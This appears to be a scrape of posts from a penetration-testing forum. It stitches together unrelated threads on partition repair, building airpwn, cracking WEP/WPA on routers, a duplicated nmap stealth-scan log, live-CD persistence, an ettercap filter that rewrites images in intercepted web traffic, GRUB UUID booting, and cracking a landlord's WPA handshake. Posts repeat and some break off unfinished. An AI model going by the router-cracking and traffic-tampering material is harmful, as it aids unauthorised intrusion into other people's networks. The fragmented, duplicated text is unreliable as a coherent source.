But, somehow Partition Magic in Vista told me it was all messed up and wanted to know if I wanted that fixed. So as an eager little beaver, who wasn't thinking I hit the "Sure why not" button. =/
Bad mistake.
@ first Windows wouldn't boot, it recognized my custom boot screen then hit a blue screen and cycled. Come to find out my Partition table got screwed up even more so i fixed it from having two boot flag's and dup.li' Entry's along with writing a new MBR & fixing the MFT down to this.

As far as i Can see my Main problem is that sda2 end's on 1315 cylinder and sda3 is set to start on cylinder 1315.
I was wondering if my problem's bigger than this, or if it's just as simple as changing that value with sfdisk or testdisk.

I've tryed testdisk and that wont do any thing, and sfdisk is to complicated for me to just start throwing value's in there.

ANY Help is sooooo Much appreciated.
I'll give you any print out you need.
PLEASE HELP ME, up for two days trying to fix this.
& I'm STUCK!

first is there any reason why bt4 doesn't come with the current version of airpwn? Are there stability problems with the new driver? I am fine with the old version, but just wanted to give it a try!

So, i guess after the removal of the old version my first question is can i work with the installed version of lorcon 171-bt0?

In the case of no, i removed it and tried to compile the source but i was stopped after configure by
Code:
configure: error: *** Missing working Linux wireless kernel extensions ***
In the case of yes,I started compiling airpwn 1.4 configure seems fine but than i got hit by this:

hi all .. i was trying to crack security for some routers .. i tried to crack web, and i done it ,, also wpa/wpa2 and i cracked it (because the password was in the dictionary as all know)

but the question is ,, that there is a router has web security,and its channel is 123 ,, and when i start the monitor mode in on its channel ,, and start airodump again i see that its channel channged to another

hi all .. i was trying to crack security for some routers .. i tried to crack web, and i done it ,, also wpa/wpa2 and i cracked it (because the password was in the dictionary as all know)

but the question is ,, that there is a router has web security,and its channel is 123 ,, and when i start the monitor mode in on its channel ,, and start airodump again i see that its channel channged to another

when i was trying to scan my network , i need some help for the following hosts which were taking too much time,

Code:
msf > db_nmap -v -PN 11.68.2.*

Starting Nmap 4.60 at 2010-01-29 13:54 GMT
Initiating Parallel DNS resolution of 43 hosts. at 13:54
Completed Parallel DNS resolution of 43 hosts. at 13:54, 16.50s elapsed
Initiating SYN Stealth Scan at 13:54
Scanning 5 hosts [1715 ports/host]
Increasing send delay for 11.68.2.0 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
Increasing send delay for 11.68.2.3 from 0 to 5 due to 11 out of 24 dropped probes since last increase.
SYN Stealth Scan Timing: About 1.47% done; ETC: 14:28 (0:33:47 remaining)
adjust_timeouts2: packet supposedly had rtt of 9534065 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Increasing send delay for 11.68.2.1 from 0 to 5 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 11.68.2.1 from 5 to 10 due to max_successful_tryno increase to 4
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 10 to 20 due to max_successful_tryno increase to 5
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 11.68.2.1 from 40 to 80 due to max_successful_tryno increase to 7
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Quote:

Well as i told ,i was scanning my internal network ,i never scan in that ip (coz i change my internal ip while posting here ), and i made a mistake posting in bug fixes,rather than in different section, bcoz i was trying to post some bugs before in this section.

when i was trying to scan my network , i need some help for the following hosts which were taking too much time,

Code:
msf > db_nmap -v -PN 11.68.2.*

Starting Nmap 4.60 at 2010-01-29 13:54 GMT
Initiating Parallel DNS resolution of 43 hosts. at 13:54
Completed Parallel DNS resolution of 43 hosts. at 13:54, 16.50s elapsed
Initiating SYN Stealth Scan at 13:54
Scanning 5 hosts [1715 ports/host]
Increasing send delay for 11.68.2.0 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
Increasing send delay for 11.68.2.3 from 0 to 5 due to 11 out of 24 dropped probes since last increase.
SYN Stealth Scan Timing: About 1.47% done; ETC: 14:28 (0:33:47 remaining)
adjust_timeouts2: packet supposedly had rtt of 9534065 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Increasing send delay for 11.68.2.1 from 0 to 5 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 11.68.2.1 from 5 to 10 due to max_successful_tryno increase to 4
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 10 to 20 due to max_successful_tryno increase to 5
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 11.68.2.1 from 40 to 80 due to max_successful_tryno increase to 7
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Quote:

Well as i told ,i was scanning my internal network ,i never scan in that ip (coz i change my internal ip while posting here ), and i made a mistake posting in bug fixes,rather than in different section, bcoz i was trying to post some bugs before in this section.

I wanted to use BT4 basically as a livecd that I can boot from my HDD and run from RAM, with persistent changes. I extracted the iso and copied it to it's own partition, and everything has worked great except for the persistence. I can't really figure out why this isn't working out of the box, maybe it's a grub2 error. I've been researching persistence and grub2, I'll post what I come up with but I'd appreciate help if anyone can see what I'm doing wrong.

I faced with problem of implementing regular expression filters in ettercap. My research start-point begin from IronGeeks post "Fun with Ettercap Filters". This is quite nice fun filter. It's work fine for my lab...

}
But filter do not work... :mad:
As I can see in log - ettercap say that this works fine
Code:
replace("Accept-Encoding", "Accept-Rubbish!");
but
Code:
pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")
just not found :confused:

OK so I was heading away on holidays and I wanted to keep my luggage to a minimum. I didn't want to bring my laptop with me, but I still wanted to have full access to all my files, my programs, my entire operating system.

So I figured hey, I can take the hard disk out of my laptop, stick it in a USB enclosure, and then just bring the hard disk around with me. The idea was I could take my hard disk and connect it into any computer and then just boot off it.

Before I went away, my Grub entry for booting Linux was as follows:

Code:
title Main Linux OS
root (hd0,2)
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
So I went away on holidays and I hooked my hard disk up to a computer via USB and then booted off it. The Grub menu appeared, and I simply hit Enter to boot into Linux. It booted up fine and everything worked.

But with some computers, there was complications.

If you look at my Grub entry above, you'll see that it makes two references to the partition on which Linux resides:

Reference 1: (hd0,2)
Reference 2: /dev/sda3

The first reference never seems to cause any problems, reason being that "hd0" will always refer to the hard disk which Grub has just booted off (or at least that's how it seems).

The second reference however can cause problems. On some of the computers I used, the Grub menu appeared, I hit Enter, and then Linux failed to load. The problem was that my own hard disk was being given the designation of sdb instead of sda. I had a workaround for this. When the Grub menu appeared, I would press E to edit the entry, and I would change the following line:

Code:
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sdb3 ro quiet splash
After I made that change, I pressed B to boot up Linux, and it booted up fine. (I didn't need to change root (hd0,2) to root (hd1,2)).

Here's what my fstab file looked like:

Code:
proc /proc proc defaults 0 0
/dev/sda3 / ext3 relatime,errors=remount-ro 0 1
As you can see, my Linux partition was referred to as "/dev/sda3" in my fstab file. Even on the computers where my hard disk was designated as sdb at boot-time, this fstab entry didn't cause any problems (you'd think I would have had to change it to sdb!). Even though my own Linux partition was designated as sdb3 at boot-time, it appears as though it was known as sda3 by the time it came to mounting the root filesystem. (Don't ask me, I haven't got a clue either).

I wanted to find the best way of making my Linux installation fully portable so that I could bring my hard disk around and boot it on different computers.

...and that's when I discovered UUID's :cool:

UUID's solve the problem of hard disks being given different designations on different systems (e.g. sda VS sdb VS sdc). Every Linux partition (e.g. ext2 ext3 ext4) has its own unique UUID. You can use this UUID to refer to the partition instead of using "/dev/sda3". To make use of UUID's, I had to change two files on my hard disk: my Grub file and my fstab file. I changed them as follows.

Here's my Grub file:
Code:
title Main Linux OS
uuid 8c5055d5-75e5-5f57-9585-5a5525551524
kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
And here's my fstab:
Code:
proc /proc proc defaults 0 0
UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1
After I made those changes, it booted every time on every computer. Notice, in these two files, that there's no reference to the hard disk number or even the partition number. You can move this Linux partition around however you like, you can change the partition order on your current hard disk, or you can move the Linux partition to a different hard disk. Your Linux installation should still boot right away without a problem because it's working off the UUID of the partition.

Anyway I thought this was pretty cool when I got it working right, and I just had to share it... this is the kind of stuff that makes me really love Linux :rolleyes:

If you wanna find out the UUID's of your partitions, do the following:
Code:
sudo blkid | sort
Also, another little cool thing I found is the "/dev/disk" folder. Navigate into that folder and take a look around!

My landlord has provided me with a password and him and his friends are able to connect using their Windows computers. I got a WPA handshake and added the password to a dictionary list but airocrack says the password isn't found. I show him the password he wrote but he insists it's correct.

Please help me since I only make a little money online and need the net to earn money for food, and I don't use Windows :(

I cannot connect to a WPA-PSK network that 2 friends on Windows computers can. Please help me since I only make a little money online and need the net to earn money for food, and I don't use Windows :(